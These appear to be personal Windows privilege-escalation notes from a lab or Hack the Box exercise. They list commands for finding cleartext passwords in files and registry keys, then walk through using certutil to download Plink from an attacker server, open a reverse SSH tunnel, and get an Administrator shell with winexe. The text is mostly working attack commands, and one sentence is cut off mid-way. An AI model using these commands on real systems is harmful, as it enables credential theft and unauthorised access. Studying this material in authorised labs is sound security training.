
To search for passwords that may be stored in clear text on a system, you can perform a file system search for files that commonly store passwords, such as configuration files, log files, or database files. Additionally, you can search for keywords or patterns that are often associated with passwords, such as "password," "pass," or "secret." Keep in mind that searching for passwords in clear text is a sensitive task and should only be performed on systems you have proper authorisation to access.

If you find passwords - you should try them! dont assume they wont work.

Just a good guide for prive esc
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

## Cleartext Passwords

### Search for them

```
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
```

### In Files

These are common files to find them in. They might be base64-encoded. So look out for that.

```
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
```

### In Registry

```
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

Plink from Putty
Nightmare fuel

To do this we can use Plink which you can download [here](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) (make sure to download the 32 bit version).

Once it’s downloaded, we need to get it on to our victim machine. From inside Alfred’s home directory (since we have write access there) we can use Python to run a http server on our machine and use `certutil` to download the file from the victim machine.

On Kali machine: `python3 -m http.server`

On victim machine: `certutil -urlcache -f http://<your_ip>:8000/plink.exe plink.exe`

Now that we have everything on the victim machine in place, we need to get our Kali machine in order. First, we need to make sure we have an ssh server running.

If you don’t have ssh installed, you can do so with `apt install ssh` and make sure it’s started with `service ssh start`

Next, we need to edit `/etc/ssh/sshd_config` and change PermitRootLogin to “yes”.

I also changed the ssh port to 2222 instead of 22 because Hack the Box did not like connecting on port 22 for some reason.

Once we have those settings changed, reload the ssh config with `service ssh reload`

Now that that’s all squared away, we will use Plink to connect back to our Kali machine from the victim machine, forwarding port 445 so we can connect to it.

plink.exe -P 2222 -l root -pw toor 10.10.14.84 -R 445:127.0.0.1:445

the Kali machine from the victim machine. But we have made port 445 available to us on our Kali machine, which we can confirm with netstat.


Now, Kali has a way for us to execute Windows commands using `winexe` which we will use to try and authenticate as Administrator using the password we discovered earlier and launch a command prompt.

winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"


And we get a shell as Administrator!